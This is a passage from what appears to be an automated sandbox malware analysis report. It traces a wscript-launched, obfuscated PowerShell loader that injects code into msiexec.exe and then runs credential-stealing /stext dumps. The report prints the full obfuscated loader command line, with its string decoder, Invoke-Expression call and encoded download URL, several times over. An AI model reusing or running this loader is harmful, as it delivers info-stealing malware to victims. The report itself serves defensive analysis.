DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyp
Source: powershell.exe, 00000002.00000002.2331664517.000001ACFDCDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06F780E0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 4_2_06F780E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22322639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_22322639
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22324AB4 mov eax, dword ptr fs:[00000030h] 7_2_22324AB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_2232724E GetProcessHeap, 7_2_2232724E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22322639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_22322639
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22322B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_22322B1C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_223260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_223260E2

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: Yara match File source: amsi64_948.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4900, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#gearstngers checkoffs unappealingly spectatress asynkron proglottis #>;$romancy='greyfly';<#israelitter dikotomien pavens dokumentbehandlings xenophobia nel #>;$glossocomium44=$velstandsstigning+$host.ui;if ($glossocomium44) {$kautioneringernes++;}function perspicable($react){$yecchs=$stactes+$react.'length'-$kautioneringernes; for( $mglingernes=3;$mglingernes -lt $yecchs;$mglingernes+=4){$kordninger='romancens';$tudehovedets+=$react[$mglingernes];$tusindfryds='stenrkners';}$tudehovedets;}function unmudded($listevalget){ & ($bikarbonaters) ($listevalget);}$fagomraadernes=perspicable ' i mfrsof.rzdiai spltollnedas r/lgn5bla.wee0dmo win(nyswunciafhnl ad u ounswovese,u c n d tcey ste1dem0par.for0.ry; as aaw,luitr.nj,n6hum4cri;pla skaxope6gyr4s m;per urirugevdiv:er.1hys2bet1slu.hal0for)f,r re gforevi.c s.kfagokon/emp2gar0 no1s m0aut0co 1ph,0 ud1,po nif hoiazorspkesalft doagrxtis/fre1fej2gas1u,f.amb0 u ';$novelisers=perspicable ' quufiss p.efedr ,v-t.oabnfg e e ensp t b. ';$stigma=perspicable 'r,th v t yptstepfla:vol/ i/a.gl tunfo 6sexb a9 ga. ens nhsouor spdam/ dsisndb roo eld rehglywbrep fewhow/ scknomo svknokkdraebesrobteab r chiendnu sg ar.stioch.c inx ev ';$milieuers=perspicable 'b r>ben ';$bikarbonaters=perspicable ' asikive uxch, ';$paraffineredes='implicity';$stofmisbrugs='\lokumernes.sus';unmudded (perspicable 'usi$ flgem l reo vab sla oml ha: cafstuo opr erdicom a tjou= ls$wheeve,npotv et:monafyspelspa pdai atretinta,ro+ co$laks rtvacosenf orm rai dessvebentrsakupu geubsboh ');unmudded (perspicable 'pol$ ftgmanl tro unbsamaintlpej: mtt whud,mat xr o epargare=bac$ .asadrtarviincg d,m naagav.tils lapbetlbe.ipo t tr(unp$colmagaisaglp eiskoelanuunde.rorre,skon)pla ');unmudded (perspicable 'hel[smanattetrita k.defsanoe.lorkr v niima,c sue,krpferosliir,mntr t agm efa vnnforaan g .yeimprw m]kal:pri: kasf reme cs,rubalrsmainobth eystrp strrenobr.t b o sac.mao rolch c o=vib sov[ pinunbesnvtlet.cars foetrycreku herstai tittidy flpcurrn.do vat .eolincreso silsent euydeppma e pa]ind: en:l,sthealr,fs.el1 sl2sen ');$stigma=$tuareg[0];$lithol31=(perspicable ' ac$ krgprelp eokvab oma all.no:s emantobipng.oo trnbaloslam suitndap rneje= trndy eu ewtil-pumobunbsikjudteopecbopt,es sydstynyf,sshaltoutem lmfev.m cn,hoearmt sa. stwtoreindb soctirlyo i u erann hyt nt ');unmudded ($lithol31);unmudded (perspicable 'tid$unum kaopronpudo ven.imoef mkoriba a omnuly.sp,hgaleopeaadodoveevi rskisun.[ven$c lnhohoexovauderu.lsavijous maegngr disgen] ef=mi.$ rof sna.erg iso trm str stao gaturdingefilrfi nvane grs,at ');$sabotren=perspicable '.es$ stmbreo manvenocavnte otram spisknae,dnmat.plad prot rwfrunundls toinsabihd nifpr ifall kaeava(hov$kl s letbomijatg somdekaspa,gle$ rrlparyintn eil amavalain sfore minm sstys)sko ';$lynlaasens=$fordmt;unmudded (perspicable ' i$rudg elnito u,bstoa pilsu,:s au huffa,opamrpa.skbsoslinciflstiipsyg
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#gearstngers checkoffs unappealingly spectatress asynkron proglottis #>;$romancy='greyfly';<#israelitter dikotomien pavens dokumentbehandlings xenophobia nel #>;$glossocomium44=$velstandsstigning+$host.ui;if ($glossocomium44) {$kautioneringernes++;}function perspicable($react){$yecchs=$stactes+$react.'length'-$kautioneringernes; for( $mglingernes=3;$mglingernes -lt $yecchs;$mglingernes+=4){$kordninger='romancens';$tudehovedets+=$react[$mglingernes];$tusindfryds='stenrkners';}$tudehovedets;}function unmudded($listevalget){ & ($bikarbonaters) ($listevalget);}$fagomraadernes=perspicable ' i mfrsof.rzdiai spltollnedas r/lgn5bla.wee0dmo win(nyswunciafhnl ad u ounswovese,u c n d tcey ste1dem0par.for0.ry; as aaw,luitr.nj,n6hum4cri;pla skaxope6gyr4s m;per urirugevdiv:er.1hys2bet1slu.hal0for)f,r re gforevi.c s.kfagokon/emp2gar0 no1s m0aut0co 1ph,0 ud1,po nif hoiazorspkesalft doagrxtis/fre1fej2gas1u,f.amb0 u ';$novelisers=perspicable ' quufiss p.efedr ,v-t.oabnfg e e ensp t b. ';$stigma=perspicable 'r,th v t yptstepfla:vol/ i/a.gl tunfo 6sexb a9 ga. ens nhsouor spdam/ dsisndb roo eld rehglywbrep fewhow/ scknomo svknokkdraebesrobteab r chiendnu sg ar.stioch.c inx ev ';$milieuers=perspicable 'b r>ben ';$bikarbonaters=perspicable ' asikive uxch, ';$paraffineredes='implicity';$stofmisbrugs='\lokumernes.sus';unmudded (perspicable 'usi$ flgem l reo vab sla oml ha: cafstuo opr erdicom a tjou= ls$wheeve,npotv et:monafyspelspa pdai atretinta,ro+ co$laks rtvacosenf orm rai dessvebentrsakupu geubsboh ');unmudded (perspicable 'pol$ ftgmanl tro unbsamaintlpej: mtt whud,mat xr o epargare=bac$ .asadrtarviincg d,m naagav.tils lapbetlbe.ipo t tr(unp$colmagaisaglp eiskoelanuunde.rorre,skon)pla ');unmudded (perspicable 'hel[smanattetrita k.defsanoe.lorkr v niima,c sue,krpferosliir,mntr t agm efa vnnforaan g .yeimprw m]kal:pri: kasf reme cs,rubalrsmainobth eystrp strrenobr.t b o sac.mao rolch c o=vib sov[ pinunbesnvtlet.cars foetrycreku herstai tittidy flpcurrn.do vat .eolincreso silsent euydeppma e pa]ind: en:l,sthealr,fs.el1 sl2sen ');$stigma=$tuareg[0];$lithol31=(perspicable ' ac$ krgprelp eokvab oma all.no:s emantobipng.oo trnbaloslam suitndap rneje= trndy eu ewtil-pumobunbsikjudteopecbopt,es sydstynyf,sshaltoutem lmfev.m cn,hoearmt sa. stwtoreindb soctirlyo i u erann hyt nt ');unmudded ($lithol31);unmudded (perspicable 'tid$unum kaopronpudo ven.imoef mkoriba a omnuly.sp,hgaleopeaadodoveevi rskisun.[ven$c lnhohoexovauderu.lsavijous maegngr disgen] ef=mi.$ rof sna.erg iso trm str stao gaturdingefilrfi nvane grs,at ');$sabotren=perspicable '.es$ stmbreo manvenocavnte otram spisknae,dnmat.plad prot rwfrunundls toinsabihd nifpr ifall kaeava(hov$kl s letbomijatg somdekaspa,gle$ rrlparyintn eil amavalain sfore minm sstys)sko ';$lynlaasens=$fordmt;unmudded (perspicable ' i$rudg elnito u,bstoa pilsu,:s au huffa,opamrpa.skbsoslinciflstiipsyg
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#gearstngers checkoffs unappealingly spectatress asynkron proglottis #>;$romancy='greyfly';<#israelitter dikotomien pavens dokumentbehandlings xenophobia nel #>;$glossocomium44=$velstandsstigning+$host.ui;if ($glossocomium44) {$kautioneringernes++;}function perspicable($react){$yecchs=$stactes+$react.'length'-$kautioneringernes; for( $mglingernes=3;$mglingernes -lt $yecchs;$mglingernes+=4){$kordninger='romancens';$tudehovedets+=$react[$mglingernes];$tusindfryds='stenrkners';}$tudehovedets;}function unmudded($listevalget){ & ($bikarbonaters) ($listevalget);}$fagomraadernes=perspicable ' i mfrsof.rzdiai spltollnedas r/lgn5bla.wee0dmo win(nyswunciafhnl ad u ounswovese,u c n d tcey ste1dem0par.for0.ry; as aaw,luitr.nj,n6hum4cri;pla skaxope6gyr4s m;per urirugevdiv:er.1hys2bet1slu.hal0for)f,r re gforevi.c s.kfagokon/emp2gar0 no1s m0aut0co 1ph,0 ud1,po nif hoiazorspkesalft doagrxtis/fre1fej2gas1u,f.amb0 u ';$novelisers=perspicable ' quufiss p.efedr ,v-t.oabnfg e e ensp t b. ';$stigma=perspicable 'r,th v t yptstepfla:vol/ i/a.gl tunfo 6sexb a9 ga. ens nhsouor spdam/ dsisndb roo eld rehglywbrep fewhow/ scknomo svknokkdraebesrobteab r chiendnu sg ar.stioch.c inx ev ';$milieuers=perspicable 'b r>ben ';$bikarbonaters=perspicable ' asikive uxch, ';$paraffineredes='implicity';$stofmisbrugs='\lokumernes.sus';unmudded (perspicable 'usi$ flgem l reo vab sla oml ha: cafstuo opr erdicom a tjou= ls$wheeve,npotv et:monafyspelspa pdai atretinta,ro+ co$laks rtvacosenf orm rai dessvebentrsakupu geubsboh ');unmudded (perspicable 'pol$ ftgmanl tro unbsamaintlpej: mtt whud,mat xr o epargare=bac$ .asadrtarviincg d,m naagav.tils lapbetlbe.ipo t tr(unp$colmagaisaglp eiskoelanuunde.rorre,skon)pla ');unmudded (perspicable 'hel[smanattetrita k.defsanoe.lorkr v niima,c sue,krpferosliir,mntr t agm efa vnnforaan g .yeimprw m]kal:pri: kasf reme cs,rubalrsmainobth eystrp strrenobr.t b o sac.mao rolch c o=vib sov[ pinunbesnvtlet.cars foetrycreku herstai tittidy flpcurrn.do vat .eolincreso silsent euydeppma e pa]ind: en:l,sthealr,fs.el1 sl2sen ');$stigma=$tuareg[0];$lithol31=(perspicable ' ac$ krgprelp eokvab oma all.no:s emantobipng.oo trnbaloslam suitndap rneje= trndy eu ewtil-pumobunbsikjudteopecbopt,es sydstynyf,sshaltoutem lmfev.m cn,hoearmt sa. stwtoreindb soctirlyo i u erann hyt nt ');unmudded ($lithol31);unmudded (perspicable 'tid$unum kaopronpudo ven.imoef mkoriba a omnuly.sp,hgaleopeaadodoveevi rskisun.[ven$c lnhohoexovauderu.lsavijous maegngr disgen] ef=mi.$ rof sna.erg iso trm str stao gaturdingefilrfi nvane grs,at ');$sabotren=perspicable '.es$ stmbreo manvenocavnte otram spisknae,dnmat.plad prot rwfrunundls toinsabihd nifpr ifall kaeava(hov$kl s letbomijatg somdekaspa,gle$ rrlparyintn eil amavalain sfore minm sstys)sko ';$lynlaasens=$fordmt;unmudded (perspicable ' i$rudg elnito u,bstoa pilsu,:s au huffa,opamrpa.skbsoslinciflstiipsyg Jump to behavior
Source: msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager'
Source: msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerC
Source: msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager"
Source: msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerp
Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22322933 cpuid 7_2_22322933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22322264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_22322264
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 13_2_004082CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0041739B GetVersionExW, 10_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
